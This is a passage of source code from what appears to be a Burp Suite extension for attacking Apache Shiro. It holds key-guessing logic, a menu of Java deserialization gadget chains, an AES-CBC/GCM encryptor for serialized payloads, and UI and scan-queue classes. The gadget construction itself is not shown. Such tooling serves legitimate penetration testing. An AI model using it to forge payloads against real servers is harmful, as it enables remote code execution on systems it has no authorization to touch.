防止因为因为跑key一直错误,间接导致站点指纹数量满了 324 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName"); 325 | Integer shiroFingerprintIssueNumber = this.getSiteIssueNumber(baseBurpUrl.getRequestDomainName(), shiroFingerprintIssueName); 326 | if (shiroFingerprintIssueNumber >= 1 && issues.size() >= 1) { 327 | issues.remove(0); 328 | } 329 | 330 | this.stdout.println("========插件错误-未知错误============"); 331 | this.stdout.println(String.format("url: %s", baseBurpUrl.getHttpRequestUrl().toString())); 332 | this.stdout.println("请使用该url重新访问,若是还多次出现此错误,则很有可能waf拦截"); 333 | this.stdout.println("错误详情请查看Extender里面对应插件的Errors标签页"); 334 | this.stdout.println("========================================"); 335 | this.stdout.println(" "); 336 | 337 | this.tags.getScanQueueTagClass().save( 338 | tagId, 339 | "", 340 | "", 341 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(), 342 | baseBurpUrl.getHttpRequestUrl().toString(), 343 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "", 344 | "[x] unknown error", 345 | baseRequestResponse); 346 | 347 | e.printStackTrace(this.stderr); 348 | } 349 | 350 | return issues; 351 | } 352 | 353 | @Override 354 | public List doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 355 | return null; 356 | } 357 | 358 | @Override 359 | public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) { 360 | return 0; 361 | } 362 | 363 | @Override 364 | public void extensionUnloaded() { 365 | this.globalVariableReader.putBooleanData("isExtensionUnload", true); 366 | } 367 | 368 | /** 369 | * 判断是否查找的到指定的域名 370 | * 371 | * @param domainName 需匹配的域名 372 | * @param domainNameList 待匹配的域名列表 373 | * @return 374 | */ 375 | private static Boolean isMatchDomainName(String domainName, List domainNameList) { 376 | domainName = domainName.trim(); 377 | 378 | if (domainName.length() <= 0) { 379 | return false; 380 
| } 381 | 382 | if (domainNameList == null || domainNameList.size() <= 0) { 383 | return false; 384 | } 385 | 386 | if (domainName.contains(":")) { 387 | domainName = domainName.substring(0, domainName.indexOf(":")); 388 | } 389 | 390 | String reverseDomainName = new StringBuffer(domainName).reverse().toString(); 391 | 392 | for (String domainName2 : domainNameList) { 393 | domainName2 = domainName2.trim(); 394 | 395 | if (domainName2.length() <= 0) { 396 | continue; 397 | } 398 | 399 | if (domainName2.contains(":")) { 400 | domainName2 = domainName2.substring(0, domainName2.indexOf(":")); 401 | } 402 | 403 | String reverseDomainName2 = new StringBuffer(domainName2).reverse().toString(); 404 | 405 | if (domainName.equals(domainName2)) { 406 | return true; 407 | } 408 | 409 | if (reverseDomainName.contains(".") && reverseDomainName2.contains(".")) { 410 | List splitDomainName = new ArrayList(Arrays.asList(reverseDomainName.split("[.]"))); 411 | 412 | List splitDomainName2 = new ArrayList(Arrays.asList(reverseDomainName2.split("[.]"))); 413 | 414 | if (splitDomainName.size() <= 0 || splitDomainName2.size() <= 0) { 415 | continue; 416 | } 417 | 418 | if (splitDomainName.size() < splitDomainName2.size()) { 419 | for (int i = splitDomainName.size(); i < splitDomainName2.size(); i++) { 420 | splitDomainName.add("*"); 421 | } 422 | } 423 | 424 | if (splitDomainName.size() > splitDomainName2.size()) { 425 | for (int i = splitDomainName2.size(); i < splitDomainName.size(); i++) { 426 | splitDomainName2.add("*"); 427 | } 428 | } 429 | 430 | int ii = 0; 431 | for (int i = 0; i < splitDomainName.size(); i++) { 432 | if (splitDomainName2.get(i).equals("*")) { 433 | ii = ii + 1; 434 | } else if (splitDomainName.get(i).equals(splitDomainName2.get(i))) { 435 | ii = ii + 1; 436 | } 437 | } 438 | 439 | if (ii == splitDomainName.size()) { 440 | return true; 441 | } 442 | } 443 | } 444 | return false; 445 | } 446 | 447 | /** 448 | * 判断是否url黑名单后缀 449 | * 大小写不区分 450 | * 是 = true, 否 = 
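false
     *
     * @param burpUrl wrapper around the request URL being checked
     * @return true when the URL's suffix is on the configured blacklist
     */
    private boolean isUrlBlackListSuffix(CustomBurpUrl burpUrl) {
        if (!this.yamlReader.getBoolean("urlBlackListSuffix.config.isStart")) {
            return false;
        }

        // Drop the query string, then keep whatever follows the last dot.
        String noParameterUrl = burpUrl.getHttpRequestUrl().toString().split("\\?")[0];
        String urlSuffix = noParameterUrl.substring(noParameterUrl.lastIndexOf(".") + 1);

        // The for-each below iterates Strings, so the list is typed accordingly.
        List<String> suffixList = this.yamlReader.getStringList("urlBlackListSuffix.suffixList");
        if (suffixList == null || suffixList.isEmpty()) {
            return false;
        }

        for (String suffix : suffixList) {
            // equalsIgnoreCase is locale-independent; lower-casing both sides is not
            // (e.g. "GIF" does not lower-case to "gif" under a Turkish default locale).
            if (suffix.equalsIgnoreCase(urlSuffix)) {
                return true;
            }
        }

        return false;
    }

    /**
     * Counts the scan issues with a given name that Burp already holds for a site.
     *
     * NOTE(review): domainName is passed straight to getScanIssues, which in the Burp API
     * takes a URL prefix - confirm getRequestDomainName() yields a matching prefix.
     *
     * @param domainName request domain name
     * @param issueName  name of the issue to count
     * @return number of matching issues
     */
    private Integer getSiteIssueNumber(String domainName, String issueName) {
        int count = 0;

        for (IScanIssue issue : this.callbacks.getScanIssues(domainName)) {
            if (issue.getIssueName().equals(issueName)) {
                count++;
            }
        }

        return count;
    }

    /**
     * Counts the site-map entries Burp holds for a site.
     *
     * @param domainName value handed to getSiteMap
     * @return number of site-map entries returned
     */
    private Integer getSiteNumber(String domainName) {
        return this.callbacks.getSiteMap(domainName).length;
    }
}

--------------------------------------------------------------------------------
/src/main/java/burp/Config.java:
--------------------------------------------------------------------------------
package burp;

/**
 * Stores the generator dialog's cipher mode and key through Burp's extension settings.
 *
 * NOTE(review): the key is persisted with saveExtensionSetting; treat that store as
 * plaintext unless confirmed otherwise.
 */
public class Config {
    // In-memory fallbacks used when nothing usable has been persisted.
    private static Integer mode = 0;
    private static String key = "";

    /**
     * @return the persisted mode index, or the in-memory value when the setting is
     *         missing or not a number
     */
    public static Integer getMode() {
        String val = BurpExtender.callbacks.loadExtensionSetting("mode");
        try {
            return Integer.valueOf(val);
        } catch (Exception e) {
            return Config.mode;
        }
    }

    /**
     * Persists the mode index.
     *
     * @param mode index of the selected cipher mode
     */
    public static void setMode(Integer mode) {
        // Must use the same setting name that getMode() reads. The original wrote to
        // "fuzz_number", so the selection was never read back from the settings store.
        BurpExtender.callbacks.saveExtensionSetting("mode", String.valueOf(mode));
        Config.mode = mode;
    }

    /**
     * @return the persisted key, or the in-memory value when none has been saved
     */
    public static String getKey() {
        String val = BurpExtender.callbacks.loadExtensionSetting("key");
        // String.valueOf on a null reference yields the literal text "null", which the
        // original then returned as the key; fall back to the in-memory value instead.
        return val != null ? val : Config.key;
    }

    /**
     * Persists the key.
     *
     * @param key key text as entered in the dialog
     */
    public static void setKey(String key) {
        BurpExtender.callbacks.saveExtensionSetting("key", String.valueOf(key));
        Config.key = key;
    }
}

--------------------------------------------------------------------------------
/src/main/java/burp/ConfigDlg.java:
--------------------------------------------------------------------------------
package burp;

import javax.swing.*;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;

/**
 * Modal dialog for choosing the cipher mode and key stored in {@link Config}.
 */
public class ConfigDlg extends JDialog {
    // Component definitions
    private final JPanel mainPanel = new JPanel();
    private final JPanel toPanel = new JPanel();
    private final JPanel centerPanel = new JPanel();
    private final JPanel bottomPanel = new JPanel();
    private final JComboBox mode = new JComboBox(new String[]{"AES-CBC", "AES-GCM"});
    private final JTextField key = new JTextField(18);
    private final JButton btSave = new JButton("保存");

    public ConfigDlg() {
        initGUI();
        initEvent();
        initValue();
        this.setTitle("设置");
    }

    /** Lays out the three rows (mode, key, save button) and centres the dialog. */
    private void initGUI() {
        toPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
        toPanel.add(new JLabel("加密模式:"));
        toPanel.add(mode);

        centerPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
        centerPanel.add(new JLabel("key:"));
        key.setFont(new Font(null, Font.PLAIN, 13));
        centerPanel.add(key);

        bottomPanel.setLayout(new FlowLayout(FlowLayout.CENTER));
        bottomPanel.add(btSave);
        btSave.setToolTipText("Hey Bro!这是保存");

        mainPanel.setLayout(new BorderLayout());
        mainPanel.add(toPanel, BorderLayout.NORTH);
        mainPanel.add(centerPanel, BorderLayout.CENTER);
        mainPanel.add(bottomPanel, BorderLayout.SOUTH);

        this.setModal(true);
        this.setDefaultCloseOperation(WindowConstants.DISPOSE_ON_CLOSE);
        this.add(mainPanel);
        // Size the dialog to fit its controls so none of them are cut off.
        this.pack();
        // Centre the dialog on the screen.
        Dimension screensize = Toolkit.getDefaultToolkit().getScreenSize();
        this.setBounds(
                screensize.width / 2 - this.getWidth() / 2,
                screensize.height / 2 - this.getHeight() / 2,
                this.getWidth(),
                this.getHeight());
    }

    /** Wires the component event handlers. */
    private void initEvent() {
        // Save button
        btSave.addActionListener(new ActionListener() {
            @Override
            public void actionPerformed(ActionEvent e) {
                Integer modeSelect = mode.getSelectedIndex();
                String keyValue = key.getText();

                // mode 0 is CBC, mode 1 is GCM
                System.out.println("mode:" + modeSelect);
                // The key itself is no longer echoed to stdout: console output can end
                // up in terminal scrollback or captured logs.

                Config.setMode(modeSelect);
                Config.setKey(keyValue);
                ConfigDlg.this.dispose();
            }
        });
    }

    /** Populates the controls from the persisted settings. */
    public void initValue() {
        Integer savedMode = Config.getMode();
        // setSelectedIndex throws IllegalArgumentException for an out-of-range index,
        // so a stale or hand-edited setting must not reach it.
        if (savedMode != null && savedMode >= 0 && savedMode < mode.getItemCount()) {
            mode.setSelectedIndex(savedMode);
        }
        key.setText(Config.getKey());
    }
}

--------------------------------------------------------------------------------
/src/main/java/burp/CustomErrorException/DiffPageException.java:
--------------------------------------------------------------------------------
package burp.CustomErrorException;

/**
 * Unchecked exception type; each constructor forwards to the matching
 * {@link RuntimeException} constructor.
 */
public class DiffPageException extends RuntimeException {
    public DiffPageException() {
        super();
    }

    public DiffPageException(String message, Throwable cause) {
        super(message, cause);
    }

    public DiffPageException(String message) {
        super(message);
    }

    public DiffPageException(Throwable cause) {
        super(cause);
    }
}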
--------------------------------------------------------------------------------
/src/main/java/burp/CustomErrorException/TaskTimeoutException.java:
--------------------------------------------------------------------------------
package burp.CustomErrorException;

/**
 * Unchecked exception type; each constructor forwards to the matching
 * {@link RuntimeException} constructor.
 */
public class TaskTimeoutException extends RuntimeException {
    public TaskTimeoutException() {
        super();
    }

    public TaskTimeoutException(String message, Throwable cause) {
        super(message, cause);
    }

    public TaskTimeoutException(String message) {
        super(message);
    }

    public TaskTimeoutException(Throwable cause) {
        super(cause);
    }
}
--------------------------------------------------------------------------------
/src/main/java/burp/CustomScanIssue.java:
--------------------------------------------------------------------------------
package burp;

import java.net.URL;

/**
 * Plain value holder implementing {@link IScanIssue}: every getter returns the value
 * handed to the constructor.
 */
public class CustomScanIssue implements IScanIssue {
    private final URL url;
    private final String issueName;
    private final int issueType;
    private final String severity;
    private final String confidence;
    private final String issueBackground;
    private final String remediationBackground;
    private final String issueDetail;
    private final String remediationDetail;
    private final IHttpRequestResponse[] httpMessages;
    private final IHttpService httpService;

    public CustomScanIssue(
            URL url,
            String issueName,
            int issueType,
            String severity,
            String confidence,
            String issueBackground,
            String remediationBackground,
            String issueDetail,
            String remediationDetail,
            IHttpRequestResponse[] httpMessages,
            IHttpService httpService) {
        this.url = url;
        this.issueName = issueName;
        this.issueType = issueType;
        this.severity = severity;
        this.confidence = confidence;
        this.issueBackground = issueBackground;
        this.remediationBackground = remediationBackground;
        this.issueDetail = issueDetail;
        this.remediationDetail = remediationDetail;
        this.httpMessages = httpMessages;
        this.httpService = httpService;
    }

    @Override
    public URL getUrl() {
        return url;
    }

    @Override
    public String getIssueName() {
        return issueName;
    }

    @Override
    public int getIssueType() {
        return issueType;
    }

    @Override
    public String getSeverity() {
        return severity;
    }

    @Override
    public String getConfidence() {
        return confidence;
    }

    @Override
    public String getIssueBackground() {
        return issueBackground;
    }

    @Override
    public String getRemediationBackground() {
        return remediationBackground;
    }

    @Override
    public String getIssueDetail() {
        return issueDetail;
    }

    @Override
    public String getRemediationDetail() {
        return remediationDetail;
    }

    @Override
    public IHttpRequestResponse[] getHttpMessages() {
        return httpMessages;
    }

    @Override
    public IHttpService getHttpService() {
        return httpService;
    }
}
--------------------------------------------------------------------------------
/src/main/java/burp/Encrypt.java:
--------------------------------------------------------------------------------
package burp;

import org.apache.shiro.codec.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;

/**
 * Serialises an object to bytes and encrypts byte arrays with a Base64-encoded AES key,
 * returning Base64 text.
 */
public class Encrypt {

    /**
     * Writes obj with Java serialisation and returns the resulting bytes.
     *
     * @param obj object to serialise
     * @return the serialised form
     * @throws IOException if the object cannot be written
     */
    public static byte[] getBytes(Object obj) throws IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(buffer);
        out.writeObject(obj);
        out.flush();
        return buffer.toByteArray();
    }

    /**
     * Encrypts objectBytes with Shiro's AesCipherService.
     *
     * NOTE(review): no operation mode is set here, so this relies on AesCipherService's
     * default, which depends on the bundled Shiro version - confirm it is CBC as the
     * method name says.
     *
     * @param key         Base64-encoded AES key
     * @param objectBytes bytes to encrypt
     * @return Base64 text of the cipher service output
     */
    public String cbc(String key, byte[] objectBytes) {
        byte[] keyDecode = Base64.decode(key);
        AesCipherService cipherService = new AesCipherService();
        ByteSource encrypted = cipherService.encrypt(objectBytes, keyDecode);
        return new String(Base64.encode(encrypted.getBytes()));
    }

    /**
     * Encrypts payload with AES/GCM/NoPadding and prefixes the IV to the ciphertext.
     *
     * @param key     Base64-encoded AES key
     * @param payload bytes to encrypt (extended by pad() first)
     * @return Base64 text of IV followed by ciphertext, or "0" on any failure
     */
    public String gcm(String key, byte[] payload) {
        try {
            byte[] raw = Base64.decode(key);
            byte[] ivs = generateInitializationVector();
            SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
            Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
            // 128 is the authentication tag length in bits.
            GCMParameterSpec gcmSpec = new GCMParameterSpec(128, ivs);
            cipher.init(Cipher.ENCRYPT_MODE, skeySpec, gcmSpec);
            byte[] encrypted = cipher.doFinal(pad(payload));
            return new String(Base64.encode(byteMerger(ivs, encrypted)));
        } catch (Exception exception) {
            // Every failure (bad key text, wrong key length, provider error) collapses
            // into the same "0" result, so callers cannot tell them apart.
            return "0";
        }
    }

    private static SecureRandom secureRandom;

    // IV size in bits.
    private static int initializationVectorSize = 128;

    /**
     * Appends the two bytes produced by charToByte(16 - s.length % 16) to s.
     *
     * NOTE(review): this is not block padding (PKCS#7 would append that many bytes), and
     * GCM with NoPadding does not need block-aligned input - presumably the consumer
     * tolerates the two trailing bytes; confirm.
     */
    private static byte[] pad(byte[] s) {
        return byteMerger(s, charToByte((char) (16 - s.length % 16)));
    }

    /** Splits a char into two bytes, high byte first. */
    private static byte[] charToByte(char c) {
        return new byte[]{
                (byte) ((c & 0xFF00) >> 8),
                (byte) (c & 0xFF)
        };
    }

    /** Returns a new array holding bt1 followed by bt2. */
    private static byte[] byteMerger(byte[] bt1, byte[] bt2) {
        byte[] merged = new byte[bt1.length + bt2.length];
        System.arraycopy(bt1, 0, merged, 0, bt1.length);
        System.arraycopy(bt2, 0, merged, bt1.length, bt2.length);
        return merged;
    }
private static byte[] generateInitializationVector() {
        // initializationVectorSize is in bits; the array is sized in bytes.
        byte[] ivBytes = new byte[getInitializationVectorSize() / 8];
        ensureSecureRandom().nextBytes(ivBytes);
        return ivBytes;
    }

    /**
     * Returns the shared generator when one is set, otherwise a newly created one.
     *
     * NOTE(review): nothing in this class assigns secureRandom, so every call appears
     * to fall through to getDefaultSecureRandom() and build a fresh instance.
     */
    private static SecureRandom ensureSecureRandom() {
        SecureRandom shared = getSecureRandom();
        return shared != null ? shared : getDefaultSecureRandom();
    }

    private static SecureRandom getSecureRandom() {
        return secureRandom;
    }

    /**
     * Requests the "SHA1PRNG" algorithm by name and falls back to the platform default
     * when it is unavailable.
     *
     * NOTE(review): pinning a named algorithm bypasses the JVM's configured default
     * generator - confirm that is intended.
     */
    private static SecureRandom getDefaultSecureRandom() {
        try {
            return SecureRandom.getInstance("SHA1PRNG");
        } catch (NoSuchAlgorithmException e) {
            return new SecureRandom();
        }
    }

    private static int getInitializationVectorSize() {
        return initializationVectorSize;
    }
}

--------------------------------------------------------------------------------
/src/main/java/burp/Menu.java:
--------------------------------------------------------------------------------
package burp;

import javax.swing.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.util.ArrayList;
import java.util.List;

/**
 * Context-menu factory that contributes a single "Generate" submenu.
 */
public class Menu implements IContextMenuFactory {

    /**
     * Builds the "Generate" submenu: six entries that each call Utils.xrayGadgets with a
     * fixed identifier, plus a "Config" entry that opens the settings dialog.
     *
     * NOTE(review): the listing shows raw List types here; type arguments may have been
     * lost when the page was extracted.
     *
     * @param invocation the context-menu invocation, passed through to Utils.xrayGadgets
     * @return a list holding the one submenu
     */
    @Override
    public List createMenuItems(final IContextMenuInvocation invocation) {
        final List menuList = new ArrayList<>();

        JMenu shiroMenu = new JMenu("Generate");
        shiroMenu.add(gadgetItem("CommonsCollectionsK1", "k1", invocation));
        shiroMenu.add(gadgetItem("CommonsCollectionsK2", "k2", invocation));
        shiroMenu.add(gadgetItem("CommonsBeanutils1", "cb1", invocation));
        shiroMenu.add(gadgetItem("CommonsBeanutils2", "cb2", invocation));
        shiroMenu.add(gadgetItem("Jdk7u21", "Jdk7u21", invocation));
        shiroMenu.add(gadgetItem("Jdk8u20", "Jdk8u20", invocation));

        final JMenuItem config = new JMenuItem("Config");
        config.addActionListener(new ActionListener() {
            @Override
            public void actionPerformed(ActionEvent e) {
                ConfigDlg dlg = new ConfigDlg();
                BurpExtender.callbacks.customizeUiComponent(dlg);
                dlg.setVisible(true);
            }
        });
        shiroMenu.add(config);

        menuList.add(shiroMenu);
        return menuList;
    }

    /**
     * Creates one menu entry whose click calls Utils.xrayGadgets(name, invocation).
     * Exceptions are printed with printStackTrace() and otherwise ignored.
     */
    private static JMenuItem gadgetItem(String label, final String name,
                                        final IContextMenuInvocation invocation) {
        JMenuItem item = new JMenuItem(label);
        item.addActionListener(new ActionListener() {
            @Override
            public void actionPerformed(ActionEvent e) {
                try {
                    Utils.xrayGadgets(name, invocation);
                } catch (Exception exception) {
                    exception.printStackTrace();
                }
            }
        });
        return item;
    }
}

--------------------------------------------------------------------------------
/src/main/java/burp/Ui/BaseSettingTag.java:
--------------------------------------------------------------------------------
package burp.Ui;

import java.awt.*;
import javax.swing.*;

import burp.IBurpExtenderCallbacks;
import burp.Bootstrap.YamlReader;

/**
 * Settings tab holding the checkbox that reports whether the plugin is switched on.
 */
public class BaseSettingTag {
    private YamlReader yamlReader;

    private JCheckBox isStartBox;

    /**
     * Builds the panel and adds it to tabs.
     *
     * @param callbacks  Burp callbacks (not used in this constructor)
     * @param tabs       tabbed pane that receives the new tab
     * @param yamlReader source of the checkbox's initial state
     */
    public BaseSettingTag(IBurpExtenderCallbacks callbacks, JTabbedPane tabs, YamlReader yamlReader) {
        JPanel baseSetting = new JPanel(new GridBagLayout());
        GridBagConstraints c = new GridBagConstraints();
        this.yamlReader = yamlReader;

        this.addSectionHeading(baseSetting, c);
        this.addStartCheckbox(baseSetting, c);

        tabs.addTab("基本设置", baseSetting);
    }

    /** Adds the coloured section heading in grid row 1. */
    private void addSectionHeading(JPanel baseSetting, GridBagConstraints c) {
        JLabel heading = new JLabel("基础设置");
        heading.setForeground(new Color(255, 89, 18));
        heading.setFont(new Font("Serif", Font.PLAIN, heading.getFont().getSize() + 2));
        c.insets = new Insets(5, 5, 5, 5);
        c.gridx = 0;
        c.gridy = 1;
        baseSetting.add(heading, c);
    }

    /** Adds the start checkbox in grid row 2, initialised from the "isStart" setting. */
    private void addStartCheckbox(JPanel baseSetting, GridBagConstraints c) {
        this.isStartBox = new JCheckBox("插件-启动", this.yamlReader.getBoolean("isStart"));
        this.isStartBox.setFont(new Font("Serif", Font.PLAIN, this.isStartBox.getFont().getSize()));
        c.insets = new Insets(5, 5, 5, 5);
        c.gridx = 0;
        c.gridy = 2;
        baseSetting.add(this.isStartBox, c);
    }

    /**
     * @return the checkbox's current state
     */
    public Boolean isStart() {
        return this.isStartBox.isSelected();
    }
}
--------------------------------------------------------------------------------
/src/main/java/burp/Ui/ScanQueueTag.java: -------------------------------------------------------------------------------- 1 | package burp.Ui; 2 | 3 | import java.awt.*; 4 | import java.text.SimpleDateFormat; 5 | import java.util.ArrayList; 6 | import java.util.Date; 7 | import java.util.List; 8 | import javax.swing.*; 9 | import javax.swing.table.AbstractTableModel; 10 | import javax.swing.table.TableModel; 11 | 12 | import burp.*; 13 | 14 | public class ScanQueueTag extends AbstractTableModel implements IMessageEditorController { 15 | 16 | private JSplitPane mjSplitPane; 17 | private List Udatas = new ArrayList(); 18 | private IMessageEditor HRequestTextEditor; 19 | private IMessageEditor HResponseTextEditor; 20 | private IHttpRequestResponse currentlyDisplayedItem; 21 | private ScanQueueTag.URLTable Utable; 22 | private JScrollPane UscrollPane; 23 | private JSplitPane HjSplitPane; 24 | private JTabbedPane Ltable; 25 | private JTabbedPane Rtable; 26 | 27 | public ScanQueueTag(IBurpExtenderCallbacks callbacks, JTabbedPane tabs) { 28 | JPanel scanQueue = new JPanel(new BorderLayout()); 29 | 30 | // 主分隔面板 31 | mjSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT); 32 | 33 | // 任务栏面板 34 | Utable = new ScanQueueTag.URLTable(ScanQueueTag.this); 35 | UscrollPane = new JScrollPane(Utable); 36 | 37 | // 请求与响应界面的分隔面板规则 38 | HjSplitPane = new JSplitPane(); 39 | HjSplitPane.setResizeWeight(0.5); 40 | 41 | // 请求的面板 42 | Ltable = new JTabbedPane(); 43 | HRequestTextEditor = callbacks.createMessageEditor(ScanQueueTag.this, false); 44 | Ltable.addTab("Request", HRequestTextEditor.getComponent()); 45 | 46 | // 响应的面板 47 | Rtable = new JTabbedPane(); 48 | HResponseTextEditor = callbacks.createMessageEditor(ScanQueueTag.this, false); 49 | Rtable.addTab("Response", HResponseTextEditor.getComponent()); 50 | 51 | // 自定义程序UI组件 52 | HjSplitPane.add(Ltable, "left"); 53 | HjSplitPane.add(Rtable, "right"); 54 | 55 | mjSplitPane.add(UscrollPane, "left"); 56 | mjSplitPane.add(HjSplitPane, 
"right"); 57 | 58 | scanQueue.add(mjSplitPane); 59 | tabs.addTab("扫描队列", scanQueue); 60 | } 61 | 62 | @Override 63 | public IHttpService getHttpService() { 64 | return currentlyDisplayedItem.getHttpService(); 65 | } 66 | 67 | @Override 68 | public byte[] getRequest() { 69 | return currentlyDisplayedItem.getRequest(); 70 | } 71 | 72 | @Override 73 | public byte[] getResponse() { 74 | return currentlyDisplayedItem.getResponse(); 75 | } 76 | 77 | @Override 78 | public int getRowCount() { 79 | return this.Udatas.size(); 80 | } 81 | 82 | @Override 83 | public int getColumnCount() { 84 | return 9; 85 | } 86 | 87 | @Override 88 | public String getColumnName(int columnIndex) { 89 | switch (columnIndex) { 90 | case 0: 91 | return "#"; 92 | case 1: 93 | return "extensionMethod"; 94 | case 2: 95 | return "encryptMethod"; 96 | case 3: 97 | return "requestMethod"; 98 | case 4: 99 | return "url"; 100 | case 5: 101 | return "statusCode"; 102 | case 6: 103 | return "issue"; 104 | case 7: 105 | return "startTime"; 106 | case 8: 107 | return "endTime"; 108 | } 109 | return null; 110 | } 111 | 112 | @Override 113 | public Class getColumnClass(int columnIndex) { 114 | return String.class; 115 | } 116 | 117 | @Override 118 | public Object getValueAt(int rowIndex, int columnIndex) { 119 | ScanQueueTag.TablesData datas = this.Udatas.get(rowIndex); 120 | switch (columnIndex) { 121 | case 0: 122 | return datas.id; 123 | case 1: 124 | return datas.extensionMethod; 125 | case 2: 126 | return datas.encryptMethod; 127 | case 3: 128 | return datas.requestMethod; 129 | case 4: 130 | return datas.url; 131 | case 5: 132 | return datas.statusCode; 133 | case 6: 134 | return datas.issue; 135 | case 7: 136 | return datas.startTime; 137 | case 8: 138 | return datas.endTime; 139 | } 140 | return null; 141 | } 142 | 143 | /** 144 | * 新增任务至任务栏面板 145 | * 146 | * @param extensionMethod 147 | * @param encryptMethod 148 | * @param requestMethod 149 | * @param url 150 | * @param statusCode 151 | * @param 
issue 152 | * @param requestResponse 153 | * @return int id 154 | */ 155 | public int add(String extensionMethod, String encryptMethod, String requestMethod, 156 | String url, String statusCode, String issue, 157 | IHttpRequestResponse requestResponse) { 158 | synchronized (this.Udatas) { 159 | Date d = new Date(); 160 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 161 | String startTime = sdf.format(d); 162 | 163 | int id = this.Udatas.size(); 164 | this.Udatas.add( 165 | new TablesData( 166 | id, 167 | extensionMethod, 168 | encryptMethod, 169 | requestMethod, 170 | url, 171 | statusCode, 172 | issue, 173 | startTime, 174 | "", 175 | requestResponse 176 | ) 177 | ); 178 | fireTableRowsInserted(id, id); 179 | return id; 180 | } 181 | } 182 | 183 | /** 184 | * 更新任务状态至任务栏面板 185 | * 186 | * @param id 187 | * @param extensionMethod 188 | * @param encryptMethod 189 | * @param requestMethod 190 | * @param url 191 | * @param statusCode 192 | * @param issue 193 | * @param requestResponse 194 | * @return int id 195 | */ 196 | public int save(int id, String extensionMethod, String encryptMethod, 197 | String requestMethod, String url, String statusCode, 198 | String issue, IHttpRequestResponse requestResponse) { 199 | ScanQueueTag.TablesData dataEntry = ScanQueueTag.this.Udatas.get(id); 200 | String startTime = dataEntry.startTime; 201 | 202 | Date d = new Date(); 203 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 204 | String endTime = sdf.format(d); 205 | 206 | synchronized (this.Udatas) { 207 | this.Udatas.set( 208 | id, 209 | new TablesData( 210 | id, 211 | extensionMethod, 212 | encryptMethod, 213 | requestMethod, 214 | url, 215 | statusCode, 216 | issue, 217 | startTime, 218 | endTime, 219 | requestResponse 220 | ) 221 | ); 222 | fireTableRowsUpdated(id, id); 223 | return id; 224 | } 225 | } 226 | 227 | /** 228 | * 自定义Table 229 | */ 230 | private class URLTable extends JTable { 231 | public URLTable(TableModel tableModel) 
{ 232 | super(tableModel); 233 | } 234 | 235 | @Override 236 | public void changeSelection(int row, int col, boolean toggle, boolean extend) { 237 | ScanQueueTag.TablesData dataEntry = ScanQueueTag.this.Udatas.get(convertRowIndexToModel(row)); 238 | HRequestTextEditor.setMessage(dataEntry.requestResponse.getRequest(), true); 239 | HResponseTextEditor.setMessage(dataEntry.requestResponse.getResponse(), false); 240 | currentlyDisplayedItem = dataEntry.requestResponse; 241 | super.changeSelection(row, col, toggle, extend); 242 | } 243 | } 244 | 245 | /** 246 | * 界面显示数据存储模块 247 | */ 248 | private static class TablesData { 249 | final int id; 250 | final String extensionMethod; 251 | final String encryptMethod; 252 | final String requestMethod; 253 | final String url; 254 | final String statusCode; 255 | final String issue; 256 | final String startTime; 257 | final String endTime; 258 | final IHttpRequestResponse requestResponse; 259 | 260 | public TablesData(int id, String extensionMethod, String encryptMethod, 261 | String requestMethod, String url, String statusCode, 262 | String issue, String startTime, String endTime, 263 | IHttpRequestResponse requestResponse) { 264 | this.id = id; 265 | this.extensionMethod = extensionMethod; 266 | this.encryptMethod = encryptMethod; 267 | this.requestMethod = requestMethod; 268 | this.url = url; 269 | this.statusCode = statusCode; 270 | this.issue = issue; 271 | this.startTime = startTime; 272 | this.endTime = endTime; 273 | this.requestResponse = requestResponse; 274 | } 275 | } 276 | } -------------------------------------------------------------------------------- /src/main/java/burp/Ui/Tags.java: -------------------------------------------------------------------------------- 1 | package burp.Ui; 2 | 3 | import java.awt.*; 4 | import javax.swing.JTabbedPane; 5 | 6 | import burp.ITab; 7 | import burp.IBurpExtenderCallbacks; 8 | 9 | import burp.Bootstrap.YamlReader; 10 | 11 | public class Tags implements ITab { 12 | private 
final JTabbedPane tabs; 13 | 14 | private String tagName; 15 | 16 | private BaseSettingTag baseSettingTag; 17 | private ScanQueueTag scanQueueTag; 18 | 19 | public Tags(IBurpExtenderCallbacks callbacks, String name) { 20 | this.tagName = name; 21 | 22 | tabs = new JTabbedPane(); 23 | 24 | YamlReader yamlReader = YamlReader.getInstance(callbacks); 25 | 26 | // 扫描队列-窗口 27 | ScanQueueTag scanQueueTag = new ScanQueueTag(callbacks, tabs); 28 | this.scanQueueTag = scanQueueTag; 29 | 30 | // 基本设置-窗口 31 | BaseSettingTag baseSettingTag = new BaseSettingTag(callbacks, tabs, yamlReader); 32 | this.baseSettingTag = baseSettingTag; 33 | 34 | // 自定义组件-导入 35 | callbacks.customizeUiComponent(tabs); 36 | 37 | // 将自定义选项卡添加到Burp的UI 38 | callbacks.addSuiteTab(Tags.this); 39 | } 40 | 41 | /** 42 | * 基础设置tag 43 | * 44 | * @return 45 | */ 46 | public BaseSettingTag getBaseSettingTagClass() { 47 | return this.baseSettingTag; 48 | } 49 | 50 | /** 51 | * 扫描队列tag 52 | * 可通过该类提供的方法,进行tag任务的添加与修改 53 | * 54 | * @return 55 | */ 56 | public ScanQueueTag getScanQueueTagClass() { 57 | return this.scanQueueTag; 58 | } 59 | 60 | @Override 61 | public String getTabCaption() { 62 | return 